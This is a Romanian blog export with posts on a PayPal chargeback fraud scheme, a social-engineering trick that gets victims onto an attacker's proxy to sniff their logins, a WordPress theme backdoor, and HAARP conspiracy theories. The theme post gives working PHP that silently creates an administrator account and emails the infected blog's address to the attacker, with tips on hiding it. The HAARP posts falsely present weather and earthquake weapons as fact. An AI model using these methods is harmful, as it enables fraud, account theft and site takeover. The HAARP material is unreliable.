</span><div style="text-align: center;"><h3>ABOUT</h3></div><div>În următoarele rânduri voi explica o metodă cu ajutorul căreia vă puteți dubla banii din contul de paypal... la nesfârșit. Probabil toți o să credeți că am găsit o vulnerabilitate web. Din păcate, este vorba despre ceva mult mai grav. Ca sa fiu mai exact este o problemă cu TOS-ul lor.</div>
<br />
Prin anul 2010 am făcut o tranzacție pe paypal cu o persoană ce a încercat să mă înșele folosind funcția chargeback. Cum eu nu îmi țineam niciodată banii pe acel cont de paypal, i-am transferat pe contul meu real. După o lună de zile când am intrat din nou pe acel cont am observat că am balanță negativă și anume -50$. Asta m-a pus pe gânduri puțin. De ce? Pentru că m-a făcut să mă gândesc la o situație care avea mai tarziu să reprezinte metoda perfectă de a îți dubla banii prin intermediul serviciului Paypal. <br />
Am raportat metoda celor de la Paypal în cadrul programului lor de Bug Bounty, gândindu-mă că poate o să îmi ofere puțin feedback și v-a fi luată în calcul cu toate că nu reprezintă o vulnerabilitate web. Dar așa cum mă așteptam răspunsul lor a fost acesta (după aproape 1 lună jumatate):<br />
<br />
<blockquote class="tr_bq">
<i>Thank you for your patience while we completed our investigation. After reviewing your submission we have determined this is not a Bug Bounty issue, but one of our Protection Policy. While the abuse described here is possible in our system, repeated abusive behavior by the same and/or linked account(s) is addressed.<br /><br />Thank you for your participation in our program.<br /><br />Thanks,<br />eBay, Inc Bug Bounty Team</i></blockquote>
<br />
Primind un asemenea răspuns, consider că nu este nimic în neregulă dacă fac publice detaliile. <br />
<br />
Să începem. În prima fază avem nevoie de 3 conturi de paypal ca în imaginea alăturată. Un cont este cel real (adică verificat cu card-ul nostru personal) iar celălalte două sunt verificate cu VCC-uri sau VBA-uri (VCC = Virtual Credit Card / VBA = Virtual Bank Account).<br />
<br />
Ce este un VCC / VBA?<br />
<blockquote class="tr_bq">
<i>Virtual credit cards (sometimes called controlled payment numbers) are
one service offered by some banks and credit card companies to help
online shoppers protect against fraud. While they have their
disadvantages, they are one of the best online safety measures currently
available.</i><br />
<i><br />Read more: <a href="http://www.ehow.com/about_7228358_virtual-credit-card_.html#ixzz33IWLbdj5">http://www.ehow.com/about_7228358_virtual-credit-card_.html</a></i></blockquote>
<br />
Deci avem pe contul nostru spre exemplu 500$. Acești bani îi vom trimite către al doilea cont cu pretextul că vrem să cumpărăm un telefon. De pe al doilea cont îi vom transfera în al treilea cont ca gift (cadou). După 24 de ore folosim funcția de chargeback de pe primul cont (cel real) pentru a ne restituii banii pentru că nu a ajuns la timp telefonul comandat. Cei de la Paypal vor deschide un proces unde amândouă părțile aduc dovezi prin care se vor apăra. Evident că doar primul cont o să trimită dovezi că a fost înșelat.<br />
<br />
Când acest proces va fi încheiat banii vor fi restituiți iar contul numărul 2 va avea balanță negativă -500$. În felul acesta ne-am dublat suma inițială deoarece încă avem 500$ și în al treilea cont. Contul numărul 2 nu va fi niciodată încărcat cu bani de unde Paypal să îi retragă deoarece este un cont virtual.<br />
<br />
Dacă gândim la scară largă unde ar fi implicate 20 de persoane, fiecare cu 500$ -- ar câștiga in 3 saptămâni aproximativ 10 000$.
<br />
<blockquote>
<pre>+----------------------------------------------------------------+
| Author: TinKode a.k.a Razvan Cernaianu @ CyberSmartDefence.com |
| Name : Safely double your money with PayPal |
| Impact: Critical |
| Date : 11.06.2014 |
| Email : info@cybersmartdefence.com |
+----------------------------------------------------------------+</pre></blockquote><div><br /></div>
Unknownnoreply@blogger.com46tag:blogger.com,1999:blog-6765804592460817910.post-78049650944945855302013-07-26T21:32:00.008+03:002023-12-08T15:27:00.319+02:00Spargerea oricărui cont al unei victime cu ajutorul ingineriei sociale <div style="text-align: justify;">După cum v-am obişnuit îmi place să aduc câte ceva mai diferit. Astăzi vom discuta despre subiectul: <i>"Cum putem sparge un cont (al unei victime) al oricărui site web cu ajutorul ingineriei sociale</i>".
Dar punctul culminant nu este ingineria socială, ci metoda prin care
obţinem datele de autentificare în cazul cel mai bun (în plain text) sau
putem să ne mulţumim doar cu sesiunea acestuia (care este totodată
suficientă pentru a surfa în contul său).</div><span><a name='more'></a></span><span></span><br /><br />
<h3 style="text-align: left;"><b>CONCEPT</b></h3><div style="text-align: justify;">Care este ideea. Poate că mulţi dintre voi aţi auzit de Burp Suite. Este
o platformă scrisă în java, special creată pentru cei care doresc să
facă penetration testing. Ce m-a atras la prima vedere? O chestie
interesantă legată de proxy. Pe scurt să creăm un server proxy cu
ajutorul aplicaţiei prin care vom intercepta traficul victimelor ce
folosesc proxy-ul nostru. Adică să facem sniffing, dar de la distanţă.</div>
<br />
<h3 style="text-align: left;">THE PROOF<br /></h3><div style="text-align: justify;">Pentru a realiza un exemplu cât mai frumos şi clar, am luat legătura cu
311733 (că era online pe chat-ul unui board de securitate şi dornic să ma ajute) pentru a se pune în
postura de victimă. Aşa că am început prin a configura Burp Suite-ul ca
în imaginea <b><a href="http://i.imgur.com/RC7Wppe.png" target="_blank">aceasta</a></b>. În acest moment mi-am transformat calculatorul într-un server proxy.
După ce am convins victima să folosească HTTP proxy-ul în browser-ul
său, vom putea să-i interceptăm nestingheriţi traficul ca în imaginea <b><a href="http://i.imgur.com/xEIOPRE.png" rel="nofollow" target="_blank">asta</a></b> sau <b><a href="http://i.imgur.com/l7E0A9r.png" rel="nofollow" target="_blank">asta</a></b>. Vedem sesiunea cu parola encriptată, care sunt mai mult decât necesare pentru a ne îndeplini scopul.</div>
<br />
<h3 style="text-align: left;"><b>SOCIAL ENGINEERING EXAMPLE</b></h3><div style="text-align: justify;">Să presupunem că victima are nevoie urgentă de o metodă care să îi
ascundă pentru câteva momente identitatea, aşa că voi îi veţi propune să
folosească un HTTP proxy securizat spunându-i că e foarte bun că l-aţi
mai folosit şi că aveţi încredere în el. După ce îl va configura, îî
interceptaţi conturile (dacă datele de logare către acele site-uri se
transmit în plain text), sau ca în pozele de mai devreme, encriptate.
Alte scenarii pot fi născocite în câteva minute deoarece nu dă nimic de
bănuit, gen: postaţi pe un forum HTTP proxy-ul iar cine îl foloseşte
devine victimă. Trimiteţi către un administrator al unui forum un mesaj
privat că nu ştiţi dacă aţi configurat bine acel proxy să îl verifice
dacă este bun sau trebuie să încercaţi altul s.a.m.d</div>
<br /><div>
Sper că vă va fi de folos pe viitor acest tutorial. Baftă.</div>Unknownnoreply@blogger.com82tag:blogger.com,1999:blog-6765804592460817910.post-51100205158623674172013-07-26T21:17:00.008+03:002023-12-08T15:30:34.330+02:00Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale<div style="text-align: left;"><div style="text-align: justify;">Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să îşi dea seama proprietarul.</div><span><a name='more'></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cât mai multe blog-uri de pe o anumită nişă web. Se gândeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit în minte să creeze şi să "infecteze" o temă (theme) visuală.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">
Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga în temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator. <br /></div><div style="text-align: left;"><br /></div>
<pre style="background: none 0% 0% repeat scroll rgb(249, 249, 249); color: #080808; text-align: left;">add_action(<span style="color: #0b6125;">'wp_head'</span>, <span style="color: #0b6125;">'wp_wordpress'</span>);
function wp_wordpress() {
if ($_GET[<span style="color: #0b6125;">'p'</span>] == <span style="color: #0b6125;">'1'</span>) {
require(<span style="color: #0b6125;">'wp-includes/registration.php'</span>);
if (!username_exists(<span style="color: #0b6125;">'wordpress'</span>)) {
$user_id = wp_create_user(<span style="color: #0b6125;">'Guest'</span>, <span style="color: #0b6125;">'password'</span>);
$user = new WP_User($user_id);
$user->set_role(<span style="color: #0b6125;">'administrator'</span>);
}
}
}
</pre><div style="text-align: justify;">Ce face codul de mai sus? Dacă este adăugat spre exemplu în templates.php (am precizat această filă deoarece este executată automat când accesăm index-ul unui blog), oricine va intra pe următorul link: <a href="http://pentesting/wp/?p=1">http://pentesting/wp/?p=1</a> (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator şi cu numele: Guest şi parola password. O remarcă importantă ar fi aceea că tema instalată trebuie să fie şi cea activă.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Legat de ingineria socială vă descurcaţi voi că sunteţi baieţi isteţi cu mult timp liber. Puteţi posta online undeva tema şi să adaugaţi undeva anumite cuvinte pentru a crea un dork să puteţi găsi blog-urile infectate. Sau îl puteţi manipula chiar pe administrator să instaleze tema.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">
Ok. Ca să fie totul complet şi pentru că nu am fost mulţumit parcă dacă nu ajutam şi cu partea asta, adică cea în care sunteţi informaţi cu ce blog a fost infectat, pe email.</div><div style="text-align: left;"><br /></div>
<pre style="background: none 0% 0% repeat scroll rgb(249, 249, 249); color: #080808; text-align: left;"><? add_action(<span style="color: #0b6125;">'wp_head'</span>,<span style="color: #0b6125;">'wp_wordpressmail'</span>);
function wp_wordpressmail(){
if ( is_user_logged_in() ) {
if(!username_exists(<span style="color: #0b6125;">'wordpress'</span>)){
$addr=<span style="color: #0b6125;">'TinKode@domain.tld'</span>; # Aici puneţi adresa voastră de email
$judul=<span style="color: #0b6125;">'WP URL'</span>;
wp_mail($addr,$judul,get_bloginfo(<span style="color: #0b6125;">'wpurl'</span>));
}
}
}
?>
</pre>
<br />
Să vă bucuraţi de metodă. Şi ca să nu vă dea de gol adresa de mail, puteţi să o encriptaţi în base64. <br />
<br />
<script class="brush: php" type="syntaxhighlighter">
$addr=base64_decode('#Aici va fi email-ul vostru encriptat în base64'); </script>Să nu uitaţi să stergeţi tag-urile PHP când adăugaţi în filă. <br />
<br /><h3 style="text-align: center;">THE END</h3>Unknownnoreply@blogger.com43tag:blogger.com,1999:blog-6765804592460817910.post-18118250616177811922013-03-14T04:53:00.019+02:002023-12-08T15:33:24.881+02:00My first TV apparition | Romania, Te iubesc: Hackerville<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='100' height='466' src='https://www.blogger.com/video.g?token=AD6v5dysuihPV6_cCB_dkAZ4mD-fnElzR0B3A75zIZfYdsNdQv6ZVjGj_D3pJC-gzk70WP4D0eBmQgpxGgS5AJ0GRg' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div><span><a name='more'></a></span><div style="text-align: left;"><br /></div><div style="text-align: left;">Prima mea aparitie TV. Video-ul de mai sus este un promo al emisiunii "<b><i>Romania, Te Iubesc: HackerVille</i></b>", in care este prezentat de aceasta data un reportaj despre hackerii romani si care va aparea duminica la data de 17.03.2013 pe ProTV, ora 18:00. <br /></div>Unknownnoreply@blogger.com22tag:blogger.com,1999:blog-6765804592460817910.post-41031739463582976952013-01-31T01:30:00.010+02:002023-12-08T15:36:52.193+02:00HAARP | Generating artificial earthquakes<br />
<i>NOTA: Pentru o buna intelegere a materialului, recomand ca anterior acestuia sa fie lecturata prezentarea “<b><a href="https://www.tinkode.com/2013/01/meteorological-war-haarp.html" target="_blank">Razboiul meteorologic – o realitate de necontestat</a></b>”</i><br />
<br />
Inregistrarile Congresului SUA facute publice au aratat ca exista preocupari certe privind utilizarea HAARP pentru scanarea interioara a continutului Terrei pe adancimi de multi kilometri in vederea localizarii de depozite subterane de munitie, tuneluri si rezerve mineraliere neexploatate inca – operatia fiind denumita “”Earth Penetrating Tomography”. Problema consta in faptul ca frecventa utilizata pentru penetrarea pamantului in profunzime corespunde domeniului de frecvente considerat ca vinovat de producerea de mutatii ireversibile asupra functiilor mentale umane.<span><a name='more'></a></span><br /><br />
Deci, HAARP dirijeaza fascicule cu energii enorme din atmosfera catre Terra, in interiorul planetei noastre. Acest fapt produce intreruperi in campul magnetic propriu al Pamantului, putand cauza cutremure majore. Multe dintre recentele cutremure de mare intensitate din ultima perioada au fost precedate de fenomene de colorare a atmosferei, caracteristice iluminarii cu radiatie HAARP.<br />
In conformitate cu un raport secret al Flotei Militare de Nord a Rusiei, tragicul cutremur din Haiti a fost cauzat de o eroare de utilizare a unei arme de generare a seismelor din dotarea US Navy, in realitate misiunea acesteia avand ca tinta Iranului. <br />
<br />
In cazul devastatorului cutremur din China din data de 12 mai 2008, faptele concrete ce pot fi mentionate sau care pot ridica intrebari sunt urmatoarele:<br />
• HAARP si-a incetat activitatea cu circa 8 ore inaintea declansarii cataclismului.<br />
• Cutremurul s-a produs la orele 6:28 UTC in data de 12 mai; <br />
• In minutele anterioare cutremurului au fost raportate o serie de fenomene stranii, inclusiv aparitia unor nori iridiscenti;<br />
• Daca cutremurul este precedat de unde scalare, se poate considera ca acestea sunt cele care-l genereaza? Daca raspunsul este pozitiv, inseamna ca ariile fazate ale diverselor dispozitive de incalzire a atmosferei existente la nivel global sunt capabile sa execute ordine politice si militare.<br />
<br />
Cutremurul din 2008 din China a produs pagube care au fost primite cu satisfactie de unii conducatori militari din Emisfera Occidentala si SUA – deoarece:<br />
• un inalt oficial militar chinez a declarat in secret ca seismul din provincia Sichuan a generat o serie de explozii in lant in zona muntilor cu acelasi nume;<br />
• a fost distrus cel mai mare arsenal al armatei, noul poligon de testare si partial facilitatile nucleare, incluzand un numar de capete nucleare - aceasta informatie fiind considerata de autoritatile chineze ca avand caracter strict secret;<br />
• dupa o atenta evaluare a datelor seismice, expertii militari au confirmat ca un soc de alta natura decat geologica s-a produs in epicentrul cutremurului, iar energia eliberata a fost echivalenta cu cea a unei explozii nucleare subterane.<br />
<br />
In prezent, chiar si prin insumarea sincronizata a energiei de iesire a tuturor dispozitivelor existente de incalzire a ionosferei nu poate fi generata puterea necesara producerii unui cutremur de proportii pe pamant, dar acest lucru nici nu este necesar in cazul in care acestea opereaza in regim debalansat neliniar, ca declansator sau ca redirectional al unor mari fluxuri energetice naturale. <br />
<br />
A fost cutremurul din China un eveniment natural intamplator? Sau a fost intentionat generat din motive strategice? Puteti lua in consideratie urmatoarele:<br />
• numarul oficial al celor decedati a fost de 80.000;<br />
• HAARP a fost deconectat cu 8 ore inainte de producerea seismului;<br />
• Magnitudinea cutremurului a fost 8,0;<br />
• S-a produs in data de 12 mai (5/12 = 5 + 1 + 2 = 8);<br />
• A avut loc exact cu 88 zile inaintea datei de deschidere a JO de la Beijing;<br />
• JO au fost deschise oficial in data de 8/8/2008 la orele 8:08PM.<br />
<br />
Simple coincidente?<br />
<br />
<br />
<i><b>Autor: Marius – Eugen Opran</b></i>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-6765804592460817910.post-32309796030602050532013-01-31T01:17:00.013+02:002023-12-08T15:35:43.317+02:00HAARP | Meteorological War<div style="text-align: justify;">A fost Romania victima unui asemenea atac in 2004? </div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Cred ca va mai aduceti aminte de anul 2004, in care Romania a fost lovita de o serie de ploi ce nu puteau fi numite torentiale, ci deluviene, producand ravagii uriase ca urmare a inundatiilor provocate. Fenomenul in ansamblul sau prezenta o serie de caracteristici nemai intalnite pana atunci la noi in tara, neexistand nici un fel echivalent al lor mentionat in arhivele meteorologice nationale – si anume :</div><div style="text-align: justify;">• se declansau extrem de rapid, durata acestora nu era foarte mare, insa intensitatea fenomenului si modul de manifestare nu aveau nimic in comun cu cele ale unor ploi normale: pe cand aceasta din urma este formata din picaturi de apa, fie chiar si de mari dimensiuni si cu o densitate volumetrica si frecventa de cadere extrem de ridicate, in cazul celor din 2004 fenomenul parea ca este dirijat de cineva din cer care ar deschide un robinet de mare debit astfel incat asupra Pamantului se prabusea o coloana de apa continua, fenomenul oprindu-se brusc la un moment dat, ca si cum acelasi robinet ar fi fost inchis la comanda;</div><span><a name='more'></a></span><div style="text-align: justify;">• s-au manifestat pe zone reduse ca suprafata si cu contur geometric trasabil: aria respective era prada potopului, iar la 5 metri de limita suprafetei lovite era soare, fara nici o picatura de ploate;</div><div style="text-align: justify;">• au avut o anumita periodicitate temporala, constatata de-a lungul celor circa 5 luni in care s-au manifestat, astfel incat spre sfarsitul perioadei declansarea lor devenise aproape predictibila pe baza de calcul bazat pe perioada de ciclicitate a fenomenelor produse anterior, fara a se putea insa stabili si locatia lor geografica a urmatoarei ploi;</div><div style="text-align: justify;">• in multe cazuri au fost insotite de fenomene meteo neintalnite in Romania pana atunci, in primul rand de tornade de mare intensitate si fenomene de iridiscente ale atmosferei.</div>
<div style="text-align: justify;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Z4Y5_60Mgak/UQmij38470I/AAAAAAAAAH4/noQ2R5CYTFw/s1600/HAARP_Ventura_concept_300.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><img border="0" height="169" src="http://3.bp.blogspot.com/-Z4Y5_60Mgak/UQmij38470I/AAAAAAAAAH4/noQ2R5CYTFw/s200/HAARP_Ventura_concept_300.jpg" width="200" /></a></div><div style="text-align: justify;">La inceput s-a crezut ca este vorba de coincidente, dupa care concluzionand ca sunt prea multe si prea vizibile, posibilitatea de a fi supusi unui atac sau chiar numai a unui experiment cu asa – numita “Arma meteorologica” a devenit din ce in ce mai mare. Deoarece nu mai urmarisem de prin anii ’80 dezvoltare acestui tip de arma, am intrat pe web si astfel am aflat cu surprindere ca progresele obtinute in domeniu de SUA si Rusia le permite intr-adevar acestora sa desfasoare adevarate razboaie meteorologice in conditii de deplina clandestinitate, ele nemai fiind insa unicele tari implicate in acest domeniu.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">La nivel mondial in prezent exista 5 asemenea instalatii:</div><div style="text-align: justify;">1) Mu Radar – 1 MW in Japonia (34°51'14.80"N / 136°6'19.45"E).</div><div style="text-align: justify;">2) Arecibo Observatory – 2 MW in Puerto Rico (18°20'38.97"N / 66°45'9.77"W).</div><div style="text-align: justify;">3) HIPAS – 70 MW in Fairbanks, Alaska (64°52'21.18"N / 146°50'18.78"W), extindere a celei mai cunoscute instalatii de acest tip la nivel mondial - HAARP</div><div style="text-align: justify;">4) Sura Ionospheric Heating Facility – 190 MW in Rusia Centrala (56°7'10.32" / N 46°2'4.41"E).</div><div style="text-align: justify;">5) EISCAT – 1 GW in Tromsø, Northern Norway (69°35'1.06"N / 19°12'57.11"E).</div>
<div style="text-align: justify;"><br /></div>
<i><div style="text-align: justify;"><i>Nota: In cazul in care doriti sa aveti o imagine clara a pozitionarii geografice a acestora, puteti ca printr-un simplu “Copy & Paste” sa introduceti coordonatele lor direct in Google Maps.</i></div></i><div style="text-align: justify;"><br /></div>
<div style="text-align: justify;">
Centrul American de cercetari avansate se afla situat in Gakona (Vest de Fairbanks) - Alaska si poarta neutra denumire de “High Auroral Active Research Project” – prescurtat HAARP, iar pe romaneste “Proiectul de cercetare activa a Aurorei Boreale”, avand in dotare un camp de 48 de antene dipol cu o inaltime de peste 20 m, fiecare legata la un emitator de mare putere, amplasate pe o zona de teren plana si rectangulara. Aflata in cea de a doua faza de dezvoltare dintr-un total de 3 prevazute, puterea de emisie a instalatiei este de 4,6 MW in banda HF, regiunea 3 … 10 MHz.</div><div style="text-align: justify;"><br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://i.pinimg.com/originals/1c/c5/43/1cc543a4ace65681d1492e76e27a795d.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: justify;"><img border="0" height="240" src="https://i.pinimg.com/originals/1c/c5/43/1cc543a4ace65681d1492e76e27a795d.jpg" width="320" /></a></div><div style="text-align: justify;">Aceasta inseamna ca o energie de o anumita frecventa poate fi amplificata de peste o mie de ori, ca urmare a proceselor naturale ce apar in momentul in care fasciculul atinge straturile superioare ale ionosferei, in acel moment energia atingand valori de ordinul Terrawatilor. Facilitatile bazei au fost extinse prin aparitia celei de a doua instalatii denumita HIPAS cu o putere de emisie de 16x mai mare decat cea a primei unitati, in general insa in toate referintele privind intregul ansamblu situat in cel mai nordic stat al SUA continuand sa fie folosita denumirea initiala de HAARP. Secretul cel mai bine pazit aici consta in modul in care proprietatile semnalului de emisie HAARP sunt modificate prin utilizarea fizicii cuantice. Principiile cuantice au schimbat total principiile fizicii traditionale, care limiteaza modul in care noi percepem dimensiunile spatiale si temporale, iar viteza maxima – la cea a luminii de 300.000 Km/s.</div>
<div style="text-align: justify;"><br /></div>
<span id="goog_1517432179"><div style="text-align: justify;"> In teorie, este in general admis ca, daca un corp va depasi viteza luminii, el va parasi imperativ spatiul temporal continuu definit de fizica clasica, ceea ce face imposibila accelerarea pana la o asemenea valoare a corpurilor in sine. In cazul in care insa, fara a deplasa corpul, il vom supune actiunii unui flux de microunde radioelectrice de foarte mare putere, efectul produs va consta in crearea unei stari de agitatie a moleculelor acestuia tradusa prin atingerea de catre aceste particule pluriatomice a unor viteze foarte mari de deplasare, fenomen ce produce la randul sau generarea unui ridicat nivel de putere de inalta frecventa. Sub actiunea ambelor, viteza de rotatie a campurilor de tahioni, de cuante si de particule electromagnetice in jurul corpului va depasi pe cea a luminii, producand asupra corpului un efect similar cazului in care chiar acesta ar atinge o asemenea viteza. Aceasta tehnologie de avangarda este deja utilizata in realizarea microcircuitelor pentru calculatoarele cu mare viteza de operare, constituind un succes tehnologic si de imagine pentru HAARP!</div></span><span id="goog_1517432180"><div style="text-align: justify;"> </div></span>
<a href="http://4.bp.blogspot.com/-b4mMTFsqg38/UQmi5ldLd8I/AAAAAAAAAIA/10A8fhqTxlU/s1600/HAARP-3.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><img border="0" src="http://4.bp.blogspot.com/-b4mMTFsqg38/UQmi5ldLd8I/AAAAAAAAAIA/10A8fhqTxlU/s1600/HAARP-3.jpg" /></a><div style="text-align: justify;">De fapt experienta de baza careia i-a fost subordonata intreaga conceptia de realizare a HAARP consta, in viziunea expertilor Pentagonului si DARPA, in atingerea posibilitatii de a genera un gigant fascicul de radiatie electromagnetica de o asemenea putere incat, folosind un unic impuls cu o durata de cateva minute pe post de bisturiu cu microunde sa creeze o incizie de mari dimensiuni in ionosfera - strat vital al atmosferei terestre. Apoi, prin incalzirea sectiunilor ionosferei astfel incizate, sa o modifice pana la cand aceasta va lua forma unei lentile curbate care sa poata reflecta puternicul fascicul energetic emis de HAARP catre Terra pentru a distruge tintele selectate in prealabil – fara a lasa nici o urma referitoare la modul in care s-a produs devastarea.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Pericolul consta in faptul ca regulile care guverneaza structura multistrat a atmosferei sunt atat de putin cunoscute, incat nimeni nu poate prezice ce s-ar putea intampla in urma practicarii de incizii care sa strapunga stratul ionosferic sau a modelarii prin incalzire a acesteia sub forma de lentila. Exista deasemenea pericolul ca energia emisa de HAARP sa interactioneze in frecventa cu alte unde naturale, disturband armonia existenta intre diversele forme de viata existente pe Pamant. Avand in vedere teoria ca anomalia inelelor lui Saturn a fost generata ca urmare a interactiunii dintre diverse unde de energie, similar exista pericolul ca HAARP si celelalte instalatii similare pot declansa schimbari catastrofice la nivelul planetei noastre, deoarece tot ceea ce face parte si constituie universul nostru se afla intr-o stare de echilibru dinamic, iar interferenta cu efectele HAARP poate destabiliza acest sistem care a fost creat si care si-a mentinut propriul sau ciclu de-a lungul a milioane de ani – protejand existenta vietii pe planeta.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Exista deasemenea pericolul ca instalatiile existente, in primul rand cele din SUA si Federatia Rusa, sa fie folosite pentru generarea de unde cu frecvente extrem de joase (ELF) cu emisie in impuls care sa fie directionate catre interiorul Pamantului, in adancime, producand dislocarea delicatelor placi tectonice suspendate prin legaturi fragile de miezul solid al terrei, cum este de exemplu cazul faliei San Andreas din California. Avand o slaba intelegere a interactiei “Placi tectonice – Vulcani – Miezul topit al Pamantului”, a incerca sa intervii direct in aceasta structura inter-relationala generand mutatii pe care sa nu le poti controla ar constitui o greseala periculoasa la nivel global, absurda si de nereparat.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">In 1973, Hondurasul a acuzat SUA ca “i-a furat” norii naturali de ploaie, provocandu-I in schimb pierderi economice uriase prin deturnarea artificiala a uraganului Fifi catre teritoriul in vederea salvarii industriei turismului din Florida. Invinovatiri similare au fost aduse in timp fostului stat nerecunoscut international Rhodesia (actualmente Zimbabwe) si Israelului de catre tarile vecine, precum si fostului URSS in 1982, invinuit ca a cauzat fenomenul El Nino in zona Pacificului urmare a unor experiente efectuate in ionosfera cu fascicule de inalta energie.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Pentagonul a ripostat la aceste acuze, publicand o lista de aplicatii HAARP pe care doreste sa le dezvolte – acestea fiind:</div><div style="text-align: justify;">• solutie de inlocuire a efectului impulsului electro-magnetic (EMP) generat prin detonarea atmosferica a dispozitivelor termo-nucleare;</div><div style="text-align: justify;">• inlocuirea voluminosului sistem de comunicatii submarine folosind frecvente extrem de joase (ELF) cu o tehnologie noua si mult mai compacta;</div><div style="text-align: justify;">• inlocuirea radiolocatoarelor de tip “Over – the – Horizons” (“Dincolo - de - Orizont”) cu un sistem mai flexibil si mai precis;</div><div style="text-align: justify;">• solutie de blocare/bruiaj a tuturor tipurilor de comunicatii hertziene pe o arie foarte mare, cu mentinerea sistemului militar propriu de comunicatii in operare;</div><div style="text-align: justify;">• crearea unui aparat de tomografiere a unor arii mari prin penetrare terestra in adancime, care – cuplat la calculatoare de mare performanta tip EMASS si CRAIG – va face posibila verificarea majoritatii pieselor, dispozitivelor si echipamentelor supuse controlului international conform prevederilor Tratatelor de Non-Proliferare Nucleara si de Pace;</div><div style="text-align: justify;">• solutie pentru detectarea rezervelor de petrol, gaze naturale si depozite de minerale pe mari suprafete;</div><div style="text-align: justify;">• solutie pentru detectia avioanelor inamice in zbor la joasa altitudine si a rachetelor de croaziera, eliminand actualele tehnologii considerate deja depasite.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">De fapt, tot experimentul HAARP pleaca de la fondatorul electricitatii moderne, croatul Nicolas Tesla, care a descoperit la inceputul sec. XX ca in ionosfera planetei noastre exista o enorma cantitate de energie electrica. Deoarece atmosfera se comporta ca un dielectric izolator, rezulta ca ansamblul “Ionosfera - Aer - Pamant” constituie un gigantic condensator electrostatic natural. De aici principiul HAARP se evidentiaza direct: captarea energiei ionice pentru a fi redistribuita intr-o anume maniera dorita si planificata. Modificarea densitatii dielectricului natural al atmosferei terestre poate provoca o descarcare electrica controlata. Prin aceasta sarcinile electrice ionizate pozitiv sunt dirijate spre solul incarcat negativ al Pamantului, care le atrage.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Actiunea practica a HAARP se traduce astfel in asigurarea transportului de mari cantitati de electricitate folosind un vehicul generat de undele radioelectrice. Este cunoscut si sub denumirea de “Dispozitiv de incalzire a ionosferei”. Procesul este realizat prin dirijarea unui fascicul directiv de unde radio catre orizontul ionosferic care intra in rezonanta. In acest mod atomii ionizati din straturile superioare ale atmosferei intra in oscilatie, proces care continua pana la atingerea frecventei de rezonanta. In acest mod zona ionosferica vizata se transforma in plasma si capata proprietati reflectorizante ca si cum ar fi o oglinda. Astfel undele HAARP sunt dirijate prin reflexie spre sol, spre care se propaga in spirala colectand din ionii care sunt in mod normal prizonierii ionosferei. Sarcinile electrice recoltate sunt apoi transportate prin spatiu cu ajutorul unui “electro-jet” cu plasma de inalta densitate.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Valurile succesive de unde electro-magnetice ce se deplaseaza cu mare viteza prezinta traiectorii perpendiculare pe liniile campului magnetic terestru, deplasandu-se intre cei doi poli. In timpul acestui voiaj in tropopauza, ele provoaca la modul “crescendo” o cascada de efecte climatice. Plasma reflectorizanta generata la nivelul ionosferei este folosita pe post de oglinda permitand dirijarea fasciculelor de energie in orice punct urmand curbura Terrei. Toate aceste explicatii semi-profesionale au avut rolul de a ajuta la intelegerea modului in care “electro-jet”-urile incarcate energetic pot provoca anti-cicloane sau muta mase de aer rece de la poli spre regiunile temperate.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Ceea ce face ca aceste dispozitive de incalzire a ionosferei sa fie extrem de utile scopului urmarit este faptul ca ele sunt realizate sub forma de arii fazate, adica o grila de antene a caror faza (timing) si amplitudine sunt reglabile individual. Acest lucru permite realizarea unei mari varietati de diferite combinatii, sintetizand noi si extrem de complexe forme de unda. Fazarea permite deasemenea dirijarea punctiforma a undei rezultate in diferite directii fara sa fie necesara deplasarea antenei in sine. Aria fazata permite in plus conjungerea partiala a fazelor sau blocarea emisiei undelor electro-magnetice. Cand aceste unde au una sau ambele componente electrica si magnetica anulate, energia lor poate lua forma unei unde longitudinale / potentiale / scalare / gravitationale / temporale.</div><div style="text-align: justify;">Dispozitivele de incalzire ionosferica permit deasemenea controlul gradientilor de densitate a electronilor si proprietatile de refractie in interiorul unor regiuni selectate ale ionosferei, ceea ce se traduce prin faptul ca pot modula densitatea electronilor ionosferici. Acest lucru reprezinta o alta metoda majora de generare a undelor longitudinale, utilizand chiar cerul ca o gigantica antena longitudinala.</div>
